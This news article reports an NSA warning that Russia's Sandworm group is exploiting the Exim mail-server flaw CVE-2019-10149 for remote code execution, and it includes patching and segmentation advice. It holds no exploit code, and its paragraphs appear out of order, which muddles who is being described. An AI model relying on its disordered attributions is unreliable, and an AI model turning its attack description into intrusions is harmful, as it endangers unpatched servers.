NSA: Russian Hackers Targeting Vulnerable Email Servers

Yolanda Curtis
May 30, 2020

The group was also called out in a February 20 statement by the Department of State for a cyberattack that disrupted government websites and broadcast television in the Republic of Georgia.

An NSA official reached by The Associated Press would only say that the agency is publicizing the vulnerability because, despite an October warning by British officials, it "has continued to be exploited and needs to be patched".

Exim is a MTA software for Unix-based systems that comes pre-installed on some Linux distributions.

When Sandworm exploits the vulnerability, victim machines download and execute a shell script from a Sandworm-controlled domain, according to the NSA.

When the patch for the vulnerability was issued a year ago, there was "no evidence" anyone was actively exploiting it, according to Exim. Within weeks of the patch being issued, the Russian military hackers began their onslaught.

The vulnerability being exploited, CVE-2019-10149, allows a remote attacker to execute commands and code of their choosing, NSA warned.

Exim is so widely used - though far less known than such commercial alternatives as Microsoft's proprietary Exchange - that some companies and government agencies that run it may still not have patched the vulnerability, said Jake Williams, president of Rendition Infosec and a former USA government hacker.

Williams also warns that attackers that exploit these types of server vulnerabilities potentially could gain full control of the server and launch more attacks. That group is more commonly known as Sandworm, the hacking group believed to be responsible for Ukraine grid disruptions.

The NSA also suggests limiting user access privileges while installing public-facing software such as mail transfer agents as well as using network segmentation to separate roles and requirements.

However, the NSA did state that the campaign was tied to a specific unit within Russia's Main Intelligence Directorate; the Main Center for Special Technologies.

The Sandworm group is the same one that interfered in the 2016 presidential election, stealing and exposing Democratic National Committee e-mails and breaking into voter registration databases.

Other reports by iNewsToday